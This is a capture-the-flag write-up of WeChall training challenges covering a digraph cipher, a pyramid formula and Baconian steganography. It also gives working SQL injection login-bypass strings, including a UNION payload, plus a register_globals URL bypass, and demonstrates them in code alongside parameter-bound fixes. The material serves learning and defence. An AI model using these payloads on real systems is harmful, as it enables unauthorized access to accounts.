WeChall CTF Writeup (4)

花海书香 2022-02-27

Challenge headings below follow this format:
[Score] [Title] [Author]

0x16 2 Training: Crypto - Digraphs by Gizmore

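Challenge description:
This time I used a digraph encryption scheme that encrypts one letter into two characters.
With only 26 different letters I can encrypt up to 26*26 different characters.
Another big problem is sharing the key, but the cipher is easily cracked.
The message is written in the current language, with correct case and punctuation. There are no line breaks.
From this it follows that every two characters correspond to one letter or symbol.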

tqlgwdfpsgunhdufhwunhdzmlgwdlapa vxlguf aclsdhsgcvlzhdlsac hdgnzmla kplslalaunfpls laufdhdhlslalaldufhwhwcvpa djunla wdlghd hdlglg aczmldldzmdhufhwhd lszmhdgnlssghe xsunla zmhdhv djlshwhwhe fplglgac dblgejpa jawdhdlssg hdgnzmla hnlscvxslgsgac unla lalghwufhdzmlgwdzo ejldejldlgejhwejwdldlshwpa

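Looking for patterns: the message contains punctuation, which most likely sits at the end of a sentence, so pa should be a punctuation mark.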

tqlgwdfpsgunhdufhwunhdzmlgwdlapa
vxlguf aclsdhsgcvlzhdlsac hdgnzmla kplslalaunfpls laufdhdhlslalaldufhwhwcvpa
djunla wdlghd hdlglg aczmldldzmdhufhwhd lszmhdgnlssghe xsunla zmhdhv djlshwhwhe fplglgac dblgejpa
jawdhdlssg hdgnzmla hnlscvxslgsgac unla lalghwufhdzmlgwdzo ejldejldlgejhwejwdldlshwpa

There are 30 letters before pa, which should form a single word: tqlgwdfpsgunhdufhwunhdzmlgwdla
A bold guess: in this context tqlgwdfpsgunhdufhwunhdzmlgwdla should be congratulations

'tq':'c',
'lg':'o',
'wd':'n',
'fp':'g',
'sg':'r',
'un':'a',
'hd':'t',
'uf':'u',
'hw':'l',
'un':'a',
'hd':'t',
'zm':'i',
'lg':'o',
'wd':'n',
'la':'s',
'pa':'.',
a = "tqlgwdfpsgunhdufhwunhdzmlgwdlapa vxlguf aclsdhsgcvlzhdlsac hdgnzmla kplslalaunfpls laufdhdhlslalaldufhwhwcvpa djunla wdlghd hdlglg aczmldldzmdhufhwhd lszmhdgnlssghe xsunla zmhdhv djlshwhwhe fplglgac dblgejpa jawdhdlssg hdgnzmla hnlscvxslgsgac unla lalghwufhdzmlgwdzo ejldejldlgejhwejwdldlshwpa"
words = a.split()
# Key recovered so far from the guessed word "Congratulations."
dic = {'tq':'C','lg':'o','wd':'n','fp':'g','sg':'r','un':'a','hd':'t','uf':'u','hw':'l','zm':'i','la':'s','pa':'.'}
for word in words:
    # Split the word into its two-character units
    pairs = [word[j:j+2] for j in range(0, len(word), 2)]
    print(pairs)

    # Substitute the known digraphs and mark unknown ones with '_'
    txt = ''.join(dic.get(p, '_') for p in pairs)
    print(txt)
    print()

Starting from "congratulations.", the other words can be inferred:

_ou - You
t_is - this
__ssag_ - message
su___ss_ull_. - successfully
goo_ - good

This gives new key entries:

'vx' : 'Y'
'gn' : 'h'
'kp' : 'M'
'ls' : 'e'
'dh' : 'c'
'pa' : ','  // guess
'ac' : 'd'

Repeat the process iteratively:

'cv' : 'y'
'lz' : 'p'
'ld' : 'f'
'dj' : 'w'
'hv' : 's'
'he' : ','  // guess


'hn' : 'k'
'xs' : 'b'
'db' : 'j'
'ej' : 'b'

bfbfoblbnfel
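
The guess-and-extend loop above can be mechanised by matching repetition patterns. This is an added example, not code from the original post; the function names are this example's own, and CIPHERTEXT is the first two sentences of the ciphertext quoted above.

```python
# First two sentences of the page's ciphertext.
CIPHERTEXT = ("tqlgwdfpsgunhdufhwunhdzmlgwdlapa vxlguf aclsdhsgcvlzhdlsac hdgnzmla "
              "kplslalaunfpls laufdhdhlslalaldufhwhwcvpa")

def digraphs(word):
    """Split a ciphertext word into its two-character units."""
    return [word[i:i + 2] for i in range(0, len(word), 2)]

def pattern(symbols):
    """Repetition pattern: each symbol becomes the index of its first occurrence."""
    seen = {}
    return tuple(seen.setdefault(s, len(seen)) for s in symbols)

def fit_crib(cipher_word, crib):
    """{digraph: char} if crib matches the word's length and repetition pattern, else None."""
    units = digraphs(cipher_word)
    return dict(zip(units, crib)) if pattern(units) == pattern(crib) else None

def merge(key, guess):
    """Add guess to key; None if a digraph gets two meanings or two digraphs share a character."""
    merged = dict(key)
    for unit, ch in guess.items():
        if merged.setdefault(unit, ch) != ch:
            return None
    return merged if len(set(merged.values())) == len(merged) else None

def extend_key(text, key, cribs):
    """Try each crib on each word and keep only guesses consistent with the key so far."""
    for crib in cribs:
        for word in text.split():
            guess = fit_crib(word, crib)
            merged = merge(key, guess) if guess else None
            if merged:
                key = merged
    return key

def decode(text, key):
    """Decode with a partial key, writing '_' for digraphs not yet known."""
    return " ".join("".join(key.get(u, "_") for u in digraphs(w)) for w in text.split())

if __name__ == "__main__":
    key = fit_crib(CIPHERTEXT.split()[0], "Congratulations.")
    print(decode(CIPHERTEXT, key))
    # "the" fits the shape of the second word but contradicts the key, so it is rejected.
    key = extend_key(CIPHERTEXT, key, ["You", "the", "this", "successfully."])
    print(decode(CIPHERTEXT, key))
```

A crib that merely has the right shape is not enough: `merge` discards it as soon as it contradicts a digraph that is already known.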

0x17 2 Training: MySQL I by Gizmore

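Challenge description:
This is the classic MySQL injection challenge.
Your task is simple: log in as admin.
Again you are given the source code, also as a highlighted version.

Look at the code the challenge provides: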

SELECT * FROM users WHERE username='$username' AND password='$password'

Answer

admin'#

0x18 2 Training: MySQL II by Gizmore

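Challenge description:
This is the same as MySQL I, but you have to come up with a more advanced injection to trick this authentication.
Your task is again: log in as admin.
Again you are given the source code, also as a highlighted version.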

<?php
/* TABLE STRUCTURE
CREATE TABLE IF NOT EXISTS users (
userid    INT(11) UNSIGNED AUTO_INCREMENT PRIMARY KEY,
username  VARCHAR(32) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL,
password  CHAR(32) CHARACTER SET ascii COLLATE ascii_bin NOT NULL
) ENGINE=myISAM;
*/

The table has three fields.
username and password are verified separately:

SELECT * FROM users WHERE username='$username'

Construct a new statement:

SELECT * FROM users WHERE username='admin1' union select 1,'admin',md5('password');#

This makes the check that follows believe that the row it found is "1, 'admin', md5('password')".
Enter password in the password field.
Answer
admin1' union select 1,'admin',md5('password');#
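
The query shapes from MySQL I and MySQL II, each next to its parameter-bound form, as an added example (not the challenge's PHP source). SQLite stands in for MySQL, so the page's `#` comment is written as `--`; the table contents, the stored admin password and all function names are constructed for this example.

```python
import hashlib
import sqlite3

def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()

def make_db():
    """Constructed stand-in for the challenge's users table (SQLite, not MySQL)."""
    db = sqlite3.connect(":memory:")
    db.create_function("md5", 1, md5_hex)   # SQLite has no built-in md5()
    db.execute("CREATE TABLE users (userid INTEGER PRIMARY KEY,"
               " username TEXT NOT NULL, password TEXT NOT NULL)")
    db.execute("INSERT INTO users (username, password) VALUES ('admin', ?)",
               (md5_hex("constructed-admin-secret"),))
    return db

def login_v1(db, username, password, bound):
    """MySQL I shape: username and password are tested in one WHERE clause."""
    if bound:
        sql = "SELECT username FROM users WHERE username=? AND password=?"
        args = (username, password)
    else:
        sql = ("SELECT username FROM users WHERE username='" + username +
               "' AND password='" + password + "'")
        args = ()
    row = db.execute(sql, args).fetchone()
    return row[0] if row else None

def login_v2(db, username, password, bound):
    """MySQL II shape: fetch the row by username, compare the hash afterwards."""
    if bound:
        sql, args = "SELECT * FROM users WHERE username=?", (username,)
    else:
        sql, args = "SELECT * FROM users WHERE username='" + username + "'", ()
    row = db.execute(sql, args).fetchone()
    if row is None or row[2] != md5_hex(password):
        return None
    return row[1]

# The page's two inputs, with MySQL's '#' comment written as '--' for SQLite.
V1_INPUT = "admin'--"
V2_INPUT = "admin1' union select 1,'admin',md5('password');--"

if __name__ == "__main__":
    db = make_db()
    for bound in (False, True):
        print("bound parameters:", bound,
              "| MySQL I:", login_v1(db, V1_INPUT, "x", bound),
              "| MySQL II:", login_v2(db, V2_INPUT, "password", bound))
```

Checking the password in application code, as MySQL II does, does not help while the row being checked still comes from a concatenated query; binding the username as a parameter is what closes both cases.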

0x19 2 Training: Register Globals by Gizmore

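Challenge description:
This challenge is a relic from the old PHP days, when register globals was enabled by default, which often led to security problems.
Again, your job is to log in as admin, and you are given the source code, also as a highlighted version.

Here is a link to the vulnerable script.
I have also set up a test account: test:test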

Reference link:
http://www.chiange.com/php%e4%bd%bf%e7%94%a8-register-globals%e5%8f%af%e8%83%bd%e5%bc%95%e5%8f%91%e7%9a%84%e9%97%ae%e9%a2%98/

Answer
http://www.wechall.net/challenge/training/php/globals/globals.php?login[0]=admin

0x20 2 Training: Math Pyramid by Gizmore

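Challenge description:
This is the first version of the math challenges.
You have to come up with the shortest solution for a geometric function (9 characters or fewer).
The story goes like this:

Pharao momo wants a square-based pyramid in which all eight edges have the same length "a".
Please support him with a formula that computes the volume for a given edge length.

Example formula: a^3/3sqrt(aa)
Notation hints: sqrt(), a^2, etc.
a^3/(3*sqrt(2)) --> a^3/18^0.5 --> 18^-0.5a^3
That is still one character too many; a search showed that the 0 before the . can be omitted.
Answer
18^-.5a^3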
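
The derivation behind that formula, added here as a worked step (it is not part of the original post). The base diagonal is a*sqrt(2), so each base corner lies a/sqrt(2) from the center of the base, and the slant edge a is the hypotenuse over the height h:

h = sqrt(a^2 - (a/sqrt(2))^2) = sqrt(a^2/2) = a/sqrt(2)
V = (1/3) * a^2 * h = a^3/(3*sqrt(2)) = a^3/sqrt(18) = 18^-0.5 * a^3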

0x20 2 Training: Baconian by Gizmore

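Challenge description:
In this training challenge you have to reveal a message hidden inside another message.
The message is known to be hidden with the Baconian cipher.
Again, the solution changes for each session and consists of 12 random characters.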

The Message
BaCoN’s cIphEr or THE bacOnIAN CiPHer iS a meThOD oF sTEGaNOGrapHY (a METhoD Of HidIng A sECRet MeSsaGe as OpPOsEd TO a TRUe CiPHeR) dEVIseD BY francis bAcoN. a MessAge Is coNCeALED in THe pRESenTatIoN OF TexT, ratHer thaN iTs coNteNt. tO enCODe A MEsSaGe, eaCh lETter Of THe pLAInText Is rePLAcED By A groUp oF fIvE OF the LettERs ‘a’ oR ‘B’. ThIS RePlaCemEnt is donE acCORDinG to thE alPhABeT of tHe BACOnIAN cIpHeR, sHoWn bElOw. NoTe: A SeCoNd vErSiOn oF BaCoN’S CiPhEr uSeS A UnIqUe cOdE FoR EaCh lEtTeR. iN OtHeR WoRdS, i aNd j eAcH HaS ItS OwN PaTtErN. tHe wRiTeR MuSt mAkE UsE Of tWo dIfFeReNt tYpEfAcEs fOr tHiS CiPhEr. AfTeR PrEpArInG A FaLsE MeSsAgE WiTh tHe sAmE NuMbEr oF LeTtErS As aLl oF ThE As aNd bS In tHe rEaL, sEcReT MeSsAgE, tWo tYpEfAcEs aRe cHoSeN, oNe tO RePrEsEnT As aNd tHe oThEr bS. tHeN EaCh lEtTeR Of tHe fAlSe mEsSaGe mUsT Be pReSeNtEd iN ThE ApPrOpRiAtE TyPeFaCe, AcCoRdInG To wHeThEr iT StAnDs fOr aN A Or a b. To dEcOdE ThE MeSsAgE, tHe rEvErSe mEtHoD Is aPpLiEd. EaCh ‘TyPeFaCe 1’ LeTtEr iN ThE FaLsE MeSsAgE Is rEpLaCeD WiTh aN A AnD EaCh ‘TyPeFaCe 2’ LeTtEr iS RePlAcEd wItH A B. tHe bAcOnIaN AlPhAbEt iS ThEn uSeD To rEcOvEr tHe oRiGiNaL MeSsAgE. aNy mEtHoD Of wRiTiNg tHe mEsSaGe tHaT AlLoWs tWo dIsTiNcT RePrEsEnTaTiOnS FoR EaCh cHaRaCtEr cAn bE UsEd fOr tHe bAcOn cIpHeR. bAcOn hImSeLf pRePaReD A BiLiTeRaL AlPhAbEt[2] FoR HaNdWrItTeN CaPiTaL AnD SmAlL LeTtErS WiTh eAcH HaViNg tWo aLtErNaTiVe fOrMs, OnE To bE UsEd aS A AnD ThE OtHeR As b. ThIs wAs pUbLiShEd aS An iLlUsTrAtEd pLaTe iN HiS De aUgMeNtIs sCiEnTiArUm (ThE AdVaNcEmEnT Of lEaRnInG). BeCaUsE AnY MeSsAgE Of tHe rIgHt lEnGtH CaN Be uSeD To cArRy tHe eNcOdInG, tHe sEcReT MeSsAgE Is eFfEcTiVeLy hIdDeN In pLaIn sIgHt. ThE FaLsE MeSsAgE CaN Be oN AnY ToPiC AnD ThUs cAn dIsTrAcT A PeRsOn sEeKiNg tO FiNd tHe rEaL MeSsAgE.

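Francis Bacon also devised a variant that treats upper and lower case as A and B, which can be used where different typefaces are not available (for example when only plain text can be handled). It is easier to spot than a difference in typeface, though, and it does not fit well with a language's own capitalization rules.
In essence, the Baconian cipher overlays binary information on ordinary writing through differences in style. The information it carries can be completely unrelated to the text that carries it.

Use code to convert the text: uppercase letters become B and lowercase letters become A.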

a = "BaCoN's cIphEr or THE bacOnIAN CiPHer iS a meThOD oF sTEGaNOGrapHY (a METhoD Of HidIng A sECRet MeSsaGe as OpPOsEd TO a TRUe CiPHeR) dEVIseD BY francis bAcoN. a MessAge Is coNCeALED in THe pRESenTatIoN OF TexT, ratHer thaN iTs coNteNt. tO enCODe A MEsSaGe, eaCh lETter Of THe pLAInText Is rePLAcED By A groUp oF fIvE OF the LettERs 'a' oR 'B'. ThIS RePlaCemEnt is donE acCORDinG to thE alPhABeT of tHe BACOnIAN cIpHeR, sHoWn bElOw. NoTe: A SeCoNd vErSiOn oF BaCoN'S CiPhEr uSeS A UnIqUe cOdE FoR EaCh lEtTeR. iN OtHeR WoRdS, i aNd j eAcH HaS ItS OwN PaTtErN. tHe wRiTeR MuSt mAkE UsE Of tWo dIfFeReNt tYpEfAcEs fOr tHiS CiPhEr. AfTeR PrEpArInG A FaLsE MeSsAgE WiTh tHe sAmE NuMbEr oF LeTtErS As aLl oF ThE As aNd bS In tHe rEaL, sEcReT MeSsAgE, tWo tYpEfAcEs aRe cHoSeN, oNe tO RePrEsEnT As aNd tHe oThEr bS. tHeN EaCh lEtTeR Of tHe fAlSe mEsSaGe mUsT Be pReSeNtEd iN ThE ApPrOpRiAtE TyPeFaCe, AcCoRdInG To wHeThEr iT StAnDs fOr aN A Or a b. To dEcOdE ThE MeSsAgE, tHe rEvErSe mEtHoD Is aPpLiEd. EaCh 'TyPeFaCe 1' LeTtEr iN ThE FaLsE MeSsAgE Is rEpLaCeD WiTh aN A AnD EaCh 'TyPeFaCe 2' LeTtEr iS RePlAcEd wItH A B. tHe bAcOnIaN AlPhAbEt iS ThEn uSeD To rEcOvEr tHe oRiGiNaL MeSsAgE. aNy mEtHoD Of wRiTiNg tHe mEsSaGe tHaT AlLoWs tWo dIsTiNcT RePrEsEnTaTiOnS FoR EaCh cHaRaCtEr cAn bE UsEd fOr tHe bAcOn cIpHeR. bAcOn hImSeLf pRePaReD A BiLiTeRaL AlPhAbEt[2] FoR HaNdWrItTeN CaPiTaL AnD SmAlL LeTtErS WiTh eAcH HaViNg tWo aLtErNaTiVe fOrMs, OnE To bE UsEd aS A AnD ThE OtHeR As b. ThIs wAs pUbLiShEd aS An iLlUsTrAtEd pLaTe iN HiS De aUgMeNtIs sCiEnTiArUm (ThE AdVaNcEmEnT Of lEaRnInG). BeCaUsE AnY MeSsAgE Of tHe rIgHt lEnGtH CaN Be uSeD To cArRy tHe eNcOdInG, tHe sEcReT MeSsAgE Is eFfEcTiVeLy hIdDeN In pLaIn sIgHt. ThE FaLsE MeSsAgE CaN Be oN AnY ToPiC AnD ThUs cAn dIsTrAcT A PeRsOn sEeKiNg tO FiNd tHe rEaL MeSsAgE."
b = []
for i in a:
    if 'A' <= i <= 'Z':      # uppercase letter -> B
        b.append('B')
    elif 'a' <= i <= 'z':    # lowercase letter -> A
        b.append('A')
    # anything else (spaces, punctuation, digits) is skipped
print(''.join(b))

Online tool:
http://www.hiencode.com/baconian.html

veryxwellxdonexfellowxhackerxthexsecretxkeywordxisxcghosibhsclixxkvfksujouwkwwurnwvfnfwjksvewvlkxlkjnjvmtmtevlkuvjfknkzeuvuvskkszktnkwvkvsusoevwvjkkzkvkvjwwvsvuvkvjvjosvvjuwkskwvjlfjfjnjflkvlnfkjuskkvfjkkvnkwvwwvuwusvjkzuwwkjktfkstmvjkvnkwkwvwvskkfsskvfnlfkswkkwwvwnvwskxkktjfv

Use Sublime to replace the x characters.
Answer
cghosibhscli
